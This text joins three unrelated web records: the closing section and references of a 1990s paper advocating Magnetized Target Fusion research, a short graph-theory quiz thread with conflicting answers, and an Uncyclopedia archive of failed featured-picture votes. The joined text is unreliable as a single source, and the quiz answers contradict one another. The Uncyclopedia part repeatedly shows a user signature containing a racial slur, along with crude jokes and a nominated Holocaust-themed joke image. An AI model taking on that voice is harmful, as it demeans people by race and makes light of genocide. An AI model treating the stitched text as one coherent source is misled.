generated near peak compression would be lost is not a major consideration for the batch-burn approach we have assumed for MTF. 1. Liner Technology and Facilities are Available. The advances in liner technology of the past few years are impressive [Chernyshev 97]. More than enough liner velocity and implosion symmetry has been demonstrated compared with the detailed requirements for an MTF liner system discussed elsewhere [Lindemuth 96, Siemon 97, Ryutov 96, and Schoenberg 98]. A quasi-spherical implosion of unmagnetized plasma has also been reported [Degnan 96]. A number of existing facilities supported by DOE’s Defense Programs and DOD would be suitable for a variety of MTF experiments. These include the Z capacitor bank at Sandia National Laboratory, the Shiva Star capacitor bank at Phillips Air Force Laboratory, the Pegasus capacitor bank at Los Alamos National Laboratory, the Ranchero explosively-driven electrical generators at Los Alamos, and the ATLAS capacitor bank under construction at Los Alamos. These facilities and expertise allow significant leveraging of research dollars, which gives additional incentive for MTF research. D. Major Technical Issues. MTF can be conceptually separated into three inter-related aspects: target plasma formation and confinement properties, liner-driver implosion, and target-plasma compression. The major technical issues are: Issues of Target Plasma Formation and Confinement Properties • plasma parameters on the proper adiabat for heating to ignition • suitable magnetic topology for magnetohydrodynamic stability and adequate thermal insulation • plasma-wall interactions leading to high-Z impurities and concomitant plasma radiation losses Liner-Driver Implosion Issues • symmetric implosions of a liner at approximately 106 cm/s (a velocity well within the range of what has been demonstrated in Defense Program experiments). • development of liner implosion configurations that match target-plasma requirements for a conducting boundary throughout the implosion • convergence ratios of roughly 10 in a stable quasi-spherical geometry Target Plasma Compression Issues • technical compatibility between plasma formation and liner-implosion technologies • accelerated mixing of wall and plasma material during the implosion, resulting for example from Rayleigh-Taylor instabilities in the liner • plasma thermal transport during the implosion • diagnostic methods under conditions of energetic implosions We recommend a multi-institutional MTF research program to address these important experimental and theoretical questions. In addition, studies are needed on how MTF would best be utilized for electricity generation or other applications. Qualitatively the intrinsically pulsed nature of MTF makes it similar to ICF in its potential application. Early studies of an electrical power plant based on liner technology [Krakowski 78] indicated the basic feasibility of a pulsed liner-driven system, and identified numerous technology issues that must be solved. An intriguing more recent study of power generation using MHD conversion of fusion energy [Logan 93] indicates that MTF is well matched to the requirements of an MHD conversion system. The energy from 14-MeV neutrons would be used to vaporize and heat a lithium-containing blanket to 1 or 2 eV. Then MHD conversion gives higher efficiency and a greatly reduced balance of plant cost leading to considerably less expensive electricity compared with conventional MFE reactor concepts. VI. Conclusions We briefly reviewed some very elementary features of all the standard fusion approaches. The main assumptions were that the fusion fuel is deuterium and tritium with a 10 keV Maxwellian velocity distribution. We emphasized the variation of quantities with fuel density and observed that the system size becomes small, and energy requirements are much reduced, when fuel density is made considerably larger than in conventional MFE systems. This general conclusion, which has been noted by many researchers in the past, warrants renewed attention today as the fusion program restructures itself within today’s budget limitations. The reasons for embarking on an MTF research effort at the present time are several: • The cost of development for fusion has become a major consideration in recent years, and MTF appears to offer advantages compared with MFE and ICF. • The pulsed power facilities of Defense Programs, both DOE and DOD, are remarkably well matched to what is needed to investigate MTF. • In the twenty years since MTF-like concepts were last seriously pursued in the United States, the theoretical understanding and experimental methods of plasma science as well as the technology of high-energy liner implosions have advanced significantly. The interesting regime we call Magnetized Target Fusion occurs at fuel density of about 1020 cm-3. The MTF regime may be an optimum in the sense of using the maximum possible magnetic field for insulation of the fuel, and thus the smallest possible system size without going to the extreme density of ICF. This new thrust in fusion research has the potential to achieve the lowest possible development cost. We believe that the arguments presented here are robust in nature and give a valid basis for recommending a new research thrust in magnetic fusion energy. Given the global importance of long-term energy R&D, adding MTF as a new complementary element to MFE and ICF in the portfolio of fusion approaches seems well justified. Acknowledgements We appreciate receiving encouragement to examine MTF from John Browne, Steve Younger, and Al Sattelberger. We also thank our colleagues Carl Ekdahl, Bob Reinovsky, and others in the pulsed power community at Los Alamos for providing expert advice on liner technology. References Bangerter 97. R. Bangerter, " The U. S. Heavy Ion Fusion Program," 12th International Symposium on Heavy Ion Inertial Fusion and Workshop on Atomic Physics, Heidelberg, Germany,September 22-27, 1997. Boozer 83. A. H. Boozer, Phys. Fluids 26, 496 (1983). Chang 78. J. Chang, M. M. Widner, A. V. Farnsworth, R. J. Leeper, T. S. Prevender, L. Baker, J. N. Olsen, in High Power Electron and Ion Beam Research and Technology (Proc. 2nd Int. Top. Conf. Ithaca, NY, 1977) Vol.1, Cornell University (1978) 195. Chernyshev 97. V. K. Chernyshev, "Study of Condensed High Energy Liner Compression," 11th International Pulsed Power Conference, Baltimore, Maryland, June 1997, and other papers of this conference. Degnan 96. J. H. Degnan, S. K. Coffey, D. G. Gale, J. D. Graham, et. al., "Solid spherical and cylindrical shell z-pinches used to compress hot hydrogen working fluid," 1996 IEEE international conference on plasma science, June 3-5, Boston (1996), 43. Also, J. H. Degnan, F. M. Lehr, J. D. Beason, G. P. Baca, D. E. Bell, A. L. Chesley, S. K. Coffey, D. Dietz, D. B. Dunlap, S. E. Englert, T. J. Englert, D. G. Gale, J. D. Graham, J. J. Havranek, C. D. Holmberg, T. W. Hussey, R. A. Lewis, C. A. Outten, R. E. Peterkin, D. W. Price, N. F. Roderick, E. L. Ruden, U. Shumlak, G. A. Smith, P. J. Turchi, Phys. Rev. Ltrs. 74, 98 (1995). Gerwin 79. R. A. Gerwin, R. C. Malone, "Adiabatic Plasma Heating and Fusion-Energy Production by a Compressible Fast Liner," Nucl. Fusion 19(2), 155 (1979). Gross 76. B. Feinberg, "An experimental study of hot plasma in contact with a cold wall," Plasma Physics 18, 265 (1976). = Hammer 91. J. H. Hammer, J. L. Eddleman, C. W. Hartman, H. S. McLean, A. W. Molvig, "Experimental demonstration of compact torus compression and acceleration," Phys Fluids B 3, 2236 (1991). Holdren 95. The U.S. Program of Fusion Energy Research and Development, The President’s Committee of Advisors on Science and Technology (PCAST), "Report of the Fusion Review Panel," J. Holdren, Chairman, (July 1995). Jarboe 94. T.R. Jarboe, "Review of spheromak research," Plasma Phys. Control. Fusion 36, 945 (1994). Kadomtsev 92. B. B. Kadomtsev, Tokamak Plasma: A Complex Physical System, (Institute of Physics Publishing, Bristol and Philadelphia, 1992). Krakowski 78. R. W. Moses, R. A. Krakowski, R. L. Miller, "A conceptual design of the fast-liner reactor (FLR) for fusion power," Los Alamos Scientific Laboratory informal report, LA-7686-MS (1979) [available on LANL library web site]. Kurtmullaev 1980. S. G. Alikhanov, V. P. Bakhtin, A. G. Es’kov, R. Kh. Kurtmullaev, V. N. Semenov, E. F. Strizhov, N. P. Kozlov, V. I. Khvesyuk, A. V. Yaminskij, "Three-dimensional Plasma Compression in a Z-Pinch Liner System – Transport and Compression of a Compact Torus by a Quasi-Spherical Liner, 8th IAEA Fusion Energy Conference III, 319 (1982). Lindemuth 83. I. R. Lindemuth, R. C. Kirkpatrick, "Parameter space for magnetized fuel targets in inertial confinement fusion," Nuclear Fusion 23(3), (1983). Lindemuth 95. I. R. Lindemuth, et.al., "Target Plasma Formation for Magnetic Compression/Magnetized Target Fusion," Phys. Rev. Ltrs. 75(10), 1953-1956 (September 1995). Lindemuth 96. I. Lindemuth, C. Ekdahl, R. Kirkpatrick, R. Reinovsky, R. Siemon, P. Sheehey, F. Wysocki, V. Chernyshev, V. Mokhov, A. Demin, S. Garanin, V. Korchagin, I. Morozov, V. Yakubov, J. Eddleman, J. Hammer, D. Ryutov, A. Toor, D. McDaniel, J. Degnan, G. Kiuttu, R. Peterkin, Jr., "Magnetic Compression / Magnetized Target Fusion (MAGO/MTF): A Marriage of Inertial and Magnetic Confinement," 16th IAEA Fusion Energy Conference, Montreal, Canada, October 7-11, 1996. Lindl 95. J. Lindl, "Development of the Indirect-Drive Approach to Inertial Confinement Fusion and the Target Physics Basis for Ignition and Gain," Phys. of Plasmas 2(11), 3933-4024 (November 1995). Logan 93. B. G. Logan, "Inertial Fusion Reactors using Compact Fusion Advanced Rankine (CFARII) MHD Conversion," Fusion Engineering and Design 22, 151-192 (1993). Pavlovskii 96. Paper at Megagauss V (1996) Robson 76. A. E. Robson, P. J. Turchi, "NRL Linus Program," Pulsed high beta plasmas (3rd topical conference on pulsed high beta plasmas, Pergamon Press, Oxford, 1976), 477. Also: P. J. Turchi, Review of the NRL Liner Implosion Programme, Megagauss Physics and Technology (Plenum Press, New York, 1980), 375 Ryutov 96. R. P. Drake, J. H. Hammer, C. W. Hartman, L. J. Perkins, D. D. Ryutov, "Submegajoule Liner Implosion of a Closed Field Line Configuration," Fusion Tech. 30, 310-325 (1996). Schoenberg 98. K. Schoenberg et. al., "Application of the ATLAS facility to MTF Experiments," to be published. Sheehey 89. P. Sheehey, "Computational Modeling of Wall-supported Dense Z-Pinches," Proc. of Second International Conference on Dense Z-Pinches, Laguna Beach, California, April 26-28, 1989. Sheffield 94. J. Sheffield, The physics of magnetic fusion reactors, Reviews of Modern Physics 66(3), 1015 (1994). Sherwood 81. A. R. Sherwood and F. L. Ribe, "Fast-Liner-Compression Fusion Systems," Fusion 1, Part B, 59-78 (1981). Siemon 97. R. E. Siemon, "Magnetized Target Fusion - A High-Density Pulsed-Power Approach to Fusion," Los Alamos National Laboratory talk LA-UR-97-764, presented at the Innovative Confinement Concepts Workshop, Marina del Rey, California, March 3-6, 1997. Spitzer 62. L. Spitzer, Physics of Fully Ionized Gases (Interscience Publishers, New York & London, 1962), p. 47. Trainor 97. J. Trainor, et. al., "Overview of the Atlas Project," Proc. of 11th IEEE International Pulsed Power Conference (Baltimore, MD, June 29- July 2, 1997, to be published). Tuszewski 88. M. Tuszewski, "Field Reversed Configuration," Nuclear Fusion 28(11), 2033-2092 (1988). Vekshtein 90. G. E. Vekshtein, "Magnetothermal Processes in Dense Plasma," Rev. Plas. Physics 15, 1 (1990). Wysocki 97. F. J. Wysocki, R. E. Chrien, G. Idzorek, H. Oona, D. O. Whiteson, R. C. Kirkpatrick, I. R. Lindemuth, and P. T. Sheehey, "Progress With Developing A Target For Magnetized Target Fusion", Proc. of 11th IEEE International Pulsed Power Conference (Baltimore, MD, June 29- July 2, 1997, to be published).
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8292484879493713, "perplexity": 2523.663350932596}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-04/segments/1547583657151.48/warc/CC-MAIN-20190116093643-20190116115643-00314.warc.gz"}
https://gateoverflow.in/282270/zeal-test-series-2019-graph-theory-graph-connectivity?show=347801
563 views 1,2 false 3,4 true. #2statements true I also got 3 and 4 as rit Arvin bhai they have given its answer 4 All four options are correct. 1) consider $K_{2}$ 2) Example as given in the other answers 3) consider $K_{2}$ 4) consider $C_{6}$ by suitable example for 2,3,4 statement given above:- every cycle graph with even no. of vertices is bipartite graph. hence 3 will be the answer. by edited statement no. 2,3,4 is correct. @BASANT KUMAR how C5 is bipartite graph? its my mistake.now corrected. all four options are true 1 522 views 1 vote
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8598310947418213, "perplexity": 11867.095414985068}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764499946.80/warc/CC-MAIN-20230201144459-20230201174459-00327.warc.gz"}
http://uncyclopedia.wikia.com/wiki/Uncyclopedia:VFP/Failed/archive14
Uncyclopedia:VFP/Failed/archive14 Bob the Sperm (history, logs) Featured picture candidate Bob was much more determined than the average sperm. Image credit: CheddarBBQ Archive - Discuss this image Vote Score: 0 Nomination: 02:20,22May,2009 02:20, 22 May 2009 (UTC) For Votes: 2 I like it more than my other crap. 02:20,22May,2009 For. --Docile hippopotamus 06:55, 22 May 2009 (UTC) Against Votes: 2 against=#Looks nothing like my sperm. $'''Shitaku Shits on you'''$ 02:20,22May,2009 Against.. Sorry my cheesy friend. Per Nachlader, I don't think this pic qualifies. -- 12:19, 22 May 2009 (UTC) Comments Far too unoriginal for my liking. The "sperm" is actually a depiction of a worm (same rhyme though) found on the cover of the brilliant 1997 vidjagame Worms 2. The fact that the only thing that's been done here is to nick that image and plant it on a background, which always makes images look less unoriginal, shows that there is absolutely nothing new about this. Also, it's a bloody worm. That and that I'd vote against anyway, I find nothing funny about this image or the article is originates from. ---kun "whisper sweet nothings into thine ear..." 10:49, 22 May 2009 (UTC) It's actually Worms: Armageddon. Much better than Worms 2. 71.207.14.13 Same dude, but looks slightly different. To me, the Worms 2 model is the same used in the nominated image. ---kun "whisper sweet nothings into thine ear..." 21:09, 22 May 2009 (UTC) Whichever game it's from, it's ineligible, so I'm aiming a super sheep launcher at this one. --UU - natter 13:52, May 22 Cat lol guitar.jpg (history, logs) Featured picture candidate Self-explaination Image credit: Iwillkillyou333 Archive - Discuss this image Vote Score: 0 Kitars Nomination: —Flutter (Talk•Games•Fun Pages•Awards•Help) 16:47, 16 May 2009 (UTC) For Votes: 4 Nom+For—Flutter (Talk•Games•Fun Pages•Awards•Help) 16:47, 16 May 2009 (UTC) For. Nice work. -OptyC Sucks! CUN16:49, 16 May For per above. --Mnb'z 03:46, 17 May 2009 (UTC) For Oh my word, that's awesome! --Pootah 22:15, 18 May 2009 (UTC) Against Votes: 4 Hell No! A picture of a cat? C'mon. 22:07,16May,2009 Tonight on Animals do the Funniest Things! Another picture of a kitten that's been made humourfied. ---kun "whisper sweet nothings into thine ear..." 23:31, 16 May 2009 (UTC) It's a cat. Holding a guitar. - T.L.B. WotM, UotM, FPrize, AotM, ANotM, PLS, UN:HS, GUN 07:26, May 17 Headband = No fucking way. -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 13:12, 17 May 2009 (UTC) Comments Cute. Too cute to vote against. 22:09, 16 May 2009 (UTC) Torn. For, because it's a great 'chop? Against, because the joke is weak? I can't deal with all this pressure! -- User:KneeChee27/sig 18:47, 17 May 2009 (UTC) I'll vote for if someone brings me that kitten. I want it! -- 16:29, 18 May 2009 (UTC) Not even remotely original. Ineligible. --UU - natter 10:10, May 19 Clipdude.PNG (history, logs) Featured picture candidate lololololololololol Image credit: The UnIdiot Archive - Discuss this image Vote Score: 5 Things I'd Like To Do Nomination: - UnIdiot | | Talk | Contribs - 17:11, Mar 11 For Votes: 19 SNF - I could be doing Spanish, or I could be nominating dumb images I find hilarious in the most juvenile ways. - UnIdiot | | Talk | Contribs - 17:11, Mar 11 LOL -Sockpuppet of an unregistered user 17:14, 11 March 2009 (UTC) FORE. Spanish class is way overrated, anyways. - P.M., WotM, & GUN, Sir Led Balloon (Tick Tock) (Contribs) 17:23, 11 March 2009 (UTC) UR MUM. Never gets old. -OptyC Sucks! CUN20:12, 11 Mar Cheap punchline. /shakes fist. • • • 03:09, Mar 12 For. --Docile hippopotamus 04:46, 13 March 2009 (UTC) For. I laugh, I vote... MrN  Fork you! 03:55, Mar 14 Hahas For. Sorry put in the wrong place b4.-Smokin' Cheddar BBQ: The King of the Triangular Snackfoods 03:08, 14 March 2009 (UTC) I always wanted to kill that clip—Flutter (Talk•Games•Fun Pages•Awards•Help) 19:54, 15 March 2009 (UTC) For the Fucking Win. Colin ALL YOUR BASEHeaney! Casa Bey Superfly Portfolio 05:18, 17 March 2009 (UTC) VERY Weak Foar, Only because it made me laugh, not very well done Rbpolsen♦☺ 01:02, 21 March 2009 (UTC) For Very immature. Very immature. --MegaPleb • Dexter111344 • Complain here 20:12, 23 March 2009 (UTC) For For For For For For For --- Ironfist Talk to me 02:40, 24 March 2009 (UTC) Reluctant For Per MrN9000. -- 02:49, 26 March 2009 (UTC) Weak for. Seen this many times but I don't get it. 14:22, 26 March 2009 (UTC) Hilarious. And that's what matters. -- T​K​F​​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​CK 02:10, 27 March 2009 (UTC) Weak for. Shoot me. I'm immature. Parsat (talk / contribs) 05:00, 3 April 2009 (UTC) lol Woody On Fire! Talking Woody Stalking Woody 20:31, 15 April 2009 (UTC) Rofltastic! I giggled like a little schoolgirl and do not know why. --CopperCore(Talk)(Contribs) 19:00, 17 April 2009 (UTC) This picture is epic win, and everyone who voted against is a soulless waste of wikispace. Who cares about effort? This is genius with a capital j. – Sir Skullthumper, MD (criticize • writings • SU&W) 19:36 Apr 22, 2009 Against Votes: 14 UR MUM. Not my cup of tea. -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 20:28, 11 March 2009 (UTC) Against. lolurmomjoak. Also, text-based and cheap as chips. No. --UU - natter 11:46, Mar 12 Against For the simple fact that I don't think this really counts as "manipulating an image." - 13:41, 16 March 2009 (UTC) Dude, cropping an image in MS Paint is totally manipulation... - UnIdiot | | Talk | Contribs - 02:35, Mar 17 Against. text based. --Mnb'z 14:43, 17 March 2009 (UTC) Against. Lolno. As the answer to a "what" question a "who" is, frankly, ridiculous. 05:35, 18 March 2009 (UTC) against. not quite. SirGerrycheeversGunTalk 14:43, 18 March 2009 (UTC) against. Funny but not feature worthy -- 17:48, 19 March 2009 (UTC) Against. Per Under user. Also blurry and poorly done.--123 •T•C•E 19:58, 25 March 2009 (UTC) It looks blurry because it's blown up on VFP. The actual file isn't blurry. -- 02:49, 26 March 2009 (UTC) The actual file may not be blurry, but it still be blown up on the front page. It doesn't have to be. (Fixed.) --Algorithm 05:01, 3 April 2009 (UTC) Yawn A shitty screenshot of a ya mom joke. -- 10:39, 30 March 2009 (UTC) vote change. Feel free to hate, but I don't care. It's cheap. • • • 15:32, Mar 31 Against.- Ditching spanish class means we will never liberate Cuba. Please think of the poor, dying cubains and not vote for this crappy image. Sir Not A Good Username360 KUN 23:26, 10 April 2009 (UTC) against Djdorama 16:08, 11 April 2009 (UTC) YES! Sir Cs1987 UOTM. t. c 14:08, 25 April 2009 (UTC) Na. ~ 11:43, 27 April 2009 (UTC) Comments Abstain. It might be the influx of poor text-based, Microsoft-related images that came before this, but this image made me laugh. However, I'm still torn. ---kun "whisper sweet nothings into thine ear..." 22:47, 11 March 2009 (UTC) Cheddar my man, your edit confuses me... - T.L.B. WotM, UotM, FPrize, AotM, ANotM, PLS, UN:HS, GUN 03:50, Mar 14 I think I remember seeing that he accidently posted his vote at the top, stealing whatever credit the nominator gained by being the first voter. ---kun "whisper sweet nothings into thine ear..." 00:34, 15 March 2009 (UTC) To everyone who says the quality is poor, I don't think you realized this is a direct screenshot... - UnIdiot | | Talk | Contribs - 20:02, Mar 25 rm, +5 after near 2 months - 04:03, 2 May 2009 (UTC) Wildecoin.jpg (history, logs) Featured picture candidate In Sophia we trust. Image credit: Sonje Archive - Discuss this image Vote Score: 1 Sophians Nomination: 14:22, 4 April 2009 (UTC) For Votes: 8 Nom+4 Sonje. Never fails :) 14:22, 4 April 2009 (UTC) 4. Sir Not A Good Username360 KUN 22:42, 4 April 2009 (UTC) I like it enough to vote For. —Socky (stalk) 10:17, 5 April 2009 (UTC) For.--123 •T•C•E 15:39, 5 April 2009 (UTC) For. Just for the kicks.—Flutter (Talk•Games•Fun Pages•Awards•Help) 20:10, 12 April 2009 (UTC) For. I love it! --CopperCore(Talk)(Contribs) 18:50, 17 April 2009 (UTC) For. --Docile hippopotamus 14:22, 23 April 2009 (UTC) For Oscar Wilde --Mnb'z 03:32, 2 May 2009 (UTC) Against Votes: 7 self against. I made this when I first joined Uncyclopedia, was just messing around, I don't think it's feature worthy. -- 20:41, 4 April 2009 (UTC) Against. Well done and all, but Wilde on a coin - how is this funny? --UU - natter 11:27, Apr 6 Against. -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 15:57, 6 April 2009 (UTC) against. not bad, but not VFP material. SirGerrycheeversGunTalk 18:40, 8 April 2009 (UTC) against Djdorama 16:24, 11 April 2009 (UTC) Against, as per UU. • • • 18:38, Apr 13 Against I don't think Zombiebaron will be voting so I have to be the critic in his place: The text doesn't match (also, text-based), and Wilde's face doesn't look metallic like a coin would. -- 01:14, 14 April 2009 (UTC) Comments 1 month, 1 score. Fail'd. 03:13, 4 May 2009 (UTC) Microchip1 (history, logs) Featured picture candidate No wonder computers need over 100gb of storage space. Image credit: Mhaille Archive - Discuss this image Vote Score: 0 microchippies Nomination: 14:44, 4 April 2009 (UTC) For Votes: 8 Nom+4 Yay! 14:44, 4 April 2009 (UTC) Can't argue with the classics. —The preceding unsigned comment was added by Not A Good Username360 (talk • contribs) diff For and I have no idea why. —Socky (stalk) 10:20, 5 April 2009 (UTC) Yeah, cool. -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 15:56, 6 April 2009 (UTC) For I prefer the ATI Dorito chip myself. Intel's stuff just doesn't have any flavor. And what's with those ridges?! - 18:54, 7 April 2009 (UTC) For. -- 16:48, 8 April 2009 (UTC) For Djdorama 16:05, 11 April 2009 (UTC) OM NOM NOM! MMM, Yummy microchip goodness! --CopperCore(Talk)(Contribs) 19:03, 17 April 2009 (UTC) Against Votes: 8 Against. It's a bit funny, but not really anything special--Smokin' Cheddar BBQ: The King of the Triangular Snackfoods 20:18, 8 April 2009 (UTC) Richard3 21:19, 9 April 2009 (UTC) I concur, its a bit dull, good idea but doesn't deliver. Nah If it had been a microchip in the shape of a potato chip it would have been funnier. This is just a chip stuck on. -- 07:57, 12 April 2009 (UTC) Against. Per DJ, I think - it's a potato chip stuck on a microchip. Not really all that funny to me. --UU - natter 17:45, Apr 12 Against. ---kun "whisper sweet nothings into thine ear..." 14:11, 14 April 2009 (UTC) Against as per UU. • • • 16:29, Apr 16 Against I didn't find it funny. Woody On Fire! Talking Woody Stalking Woody 15:38, 29 April 2009 (UTC) Againt per above. --Mnb'z 03:34, 2 May 2009 (UTC) Comments 1 month, 0 score. Fail'd. 03:13, 4 May 2009 (UTC) "Penetrate" image title here, without link (history, logs) Featured picture candidate Sometimes in life you will find that the world turns into Jar Jar Binks and then God takes Sauron into space while an alien watches through the window approvingly. Image credit: Sliferjam Archive - Discuss this image Vote Score: -3 images that are totally better than the image below it Nomination: Syndrome For Votes: 1 Haha wut -- 21:07, 5 May 2009 (UTC) Against Votes: 4 No per Jar Jar Binks. 21:12, 5 May 2009 (UTC) Against per Lord Sauron's vagEYEna. ---kun "whisper sweet nothings into thine ear..." 21:39, 5 May 2009 (UTC) Against. Perhaps my crack dosage just wasn't high enough today but I don't get it. -- 21:50, 5 May 2009 (UTC) Against. lolwut, etc. 02:47, 6 May 2009 (UTC) Comments -3, fail'd. 02:47, 6 May 2009 (UTC) Holocaust Tycoon 2 (history, logs) Featured picture candidate Do you have what it takes to mastermind the Master Race? Image credit: Heino Archive - Discuss this image Vote Score: -3 jewrides Nomination: CrabPope For Votes: 1 Nom and for It's so wrong, but I love it. —The preceding unsigned comment was added by CrabPope (talk • contribs) Against Votes: 4 Against Not really funny outside the article. -- 23:40, 5 May 2009 (UTC) Against Maybe if it was more Holocausty. Right now the word is switched, but its just a theme park behind. Nothing really funny about that. Woody On Fire! Talking Woody Stalking Woody 23:53, 5 May 2009 (UTC) Needs more Auschwitz. • • • 01:16, May 6 Against. As above. 02:56, 6 May 2009 (UTC) Comments -3, fail'd. 02:57, 6 May 2009 (UTC) WikiEaster (history, logs) Featured picture candidate Of course, Uncyclopedia's logo is a copy of Uncyclopedia's Easter Logo. Image credit: Tompkins Archive - Discuss this image Vote Score: -5 Easter Bunnies! Nomination: 06:17, 9 May 2009 (UTC) For Votes: 1 An ankh smiles upon thou. 06:17, 9 May 2009 (UTC) Against Votes: 6 Not really funny. Woody On Fire! Talking Woody Stalking Woody 06:47, 9 May 2009 (UTC) Against. Er, no. --UU - natter 08:37, May 9 AGH THE COLORS! 08:59, 9 May 2009 (UTC) AHAHAAHAAH I SHIT MY PANTS ---kun "whisper sweet nothings into thine ear..." 09:59, 9 May 2009 (UTC) ... ...Really? -OptyC Sucks! CUN15:26, 9 May Girl, you really got me goin'.... -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 16:59, 9 May 2009 (UTC) Comments -5, fail'd. 18:47, 9 May 2009 (UTC) Daeh-gnidolpxE (history, logs) Featured picture candidate Image credit: ErrickFoxy Archive - Discuss this image Vote Score: -3 people with SEHS Nomination: 11:07, 9 May 2009 (UTC) For Votes: 1 Bless + 4 Isn't this life? 11:07, 9 May 2009 (UTC) Against Votes: 4 Disgusting either way. 11:09, 9 May 2009 (UTC) Running it backwards makes it new again! Nah. -OptyC Sucks! CUN15:24, 9 May This ever going to stop? ---kun "whisper sweet nothings into thine ear..." 16:27, 9 May 2009 (UTC) HOLY SHIT, REMEMBER WHEN THAT GUY'S HEAD IN SCANNERS BLEW UP.........BACKWARDS?!?!?! -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 16:50, 9 May 2009 (UTC) Comments -3, fail'd. 18:47, 9 May 2009 (UTC) "Deer (history, logs) Featured picture candidate A" dear in it's natural Habitat. Image credit: Hairy Midget Archive - Discuss this image Vote Score: -4 Hairy deers Nomination: 11:55, 10 May 2009 (UTC) For Votes: 3 Ra smiles upon thou. 11:55, 10 May 2009 (UTC) HAHAHAHAHAHA But you really do need to stop doing this, seriously, what's wrong with you? (i fuckin' love this one though, honestly) -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 15:30, 10 May 2009 (UTC) Point taken. *scribbles furiously on notebook* 08:13, 11 May 2009 (UTC) For. --Docile hippopotamus 16:14, 10 May 2009 (UTC) Against Votes: 7 Against. Please stop nominating images like these. ---kun "whisper sweet nothings into thine ear..." 15:14, 10 May 2009 (UTC) Against. As per Nachlader. 15:26, 10 May 2009 (UTC) +1 Fathers of Bambi (talk) 20:38, 10 May 2009 (UTC) Nah Woody On Fire! Talking Woody Stalking Woody 05:27, 11 May 2009 (UTC) Hilarious -- 07:24, 11 May 2009 (UTC) Against. Oh dear. --UU - natter 09:15, May 11 Against. I'm calling PETA -- 10:08, 11 May 2009 (UTC) Comments I fixed the caption. -- 18:05, 10 May 2009 (UTC) -4, fail'd. 14:58, 11 May 2009 (UTC) "Voodoo" Cheddar (history, logs) Featured picture candidate Time to put an end to all whoring once and for all... Image credit: Sonje Archive - Discuss this image Vote Score: -5 Dead Cheddars Nomination: ~SirTagstit • VFH • NotM • PEEING • CPT • RotM • BFF 02:52, 11 May 2009 (UTC) For Votes: 2 #I don't think this will pass, but I found it funny enough to give it a shot. And...and...its Sonje work. ~SirTagstit • VFH • NotM • PEEING • CPT • RotM • BFF 02:52, 11 May 2009 (UTC) Ow WTF? That hurt. But it is funny.-- 02:58,11May,2009 For. It's a Sonje pic, auto for (talk) 05:01, 11 May 2009 (UTC) Against Votes: 7 Against. I've moved on. You should too. Also, vanity, and not the good kind of vanity, where it's a picture of me being sexy. 03:11, 11 May 2009(UTC) Oh this is by no means an attack on him. I like Cheddar, I just thought this was funny. ~SirTagstit • VFH • NotM • PEEING • CPT • RotM • BFF 03:20, 11 May 2009 (UTC) I made this in retaliation to Cheddar having the audacity to put me on his list of followers, it actually had nothing to do with the whoring event. PS: Modus, your sexiness cannot be captured on film. But not because it would crack the lense or anything...-- 03:34, 11 May 2009 (UTC) The pictures turn out best if you leave the lens cap on. It leaves more to the imagination. The sexy, sexy imagination. 04:24, 11 May 2009 (UTC) Yeah, that Cheddar is pretty audacious. Also, Against. -- 06:55, 11 May 2009 (UTC) Injoke, vanity, unfunny. Look people, Uncyclopedia is not your bitch, other people read it. Other people who don't care about you. None of them would get this. They do get this however. -- 07:09, 11 May 2009 (UTC) OMG! That is so funny! How did you find that? -- 10:43, 11 May 2009 (UTC) Chill. It was meant as an in-joke, never intended for featuring. Dammit! Now I have to get revenge on Syndrome too! What does a Syndrome look like? -- 09:08, 11 May 2009 (UTC) In the words of Madonna, like a virgin. ---kun "whisper sweet nothings into thine ear..." 10:20, 11 May 2009 (UTC) Against. Whenever the author votes against. But also the fact that it's really not funny. ---kun "whisper sweet nothings into thine ear..." 10:20, 11 May 2009 (UTC) Against Just to get it off   16:01, 11 May 2009 (UTC) No! No! No! Down with the drama! 16:10, 11 May 2009 (UTC) It had nothing to do with the drama, it is a completely different separate thing altogether. Cheddar and I were having a discussion on my talk page. Tagstit found it funny and nommed it. It is just a joke, no personal attack, ask Cheddar if you want or check my talk page. Shall we move on. -- 16:15, 11 May 2009 (UTC) I know that, but it sounded like an appropriate thing to say. 16:19, 11 May 2009 (UTC) Comments Ya sorry maybe I took it a bit too far but it was meant more as an injoke than a personal attack. ~SirTagstit • VFH • NotM • PEEING • CPT • RotM • 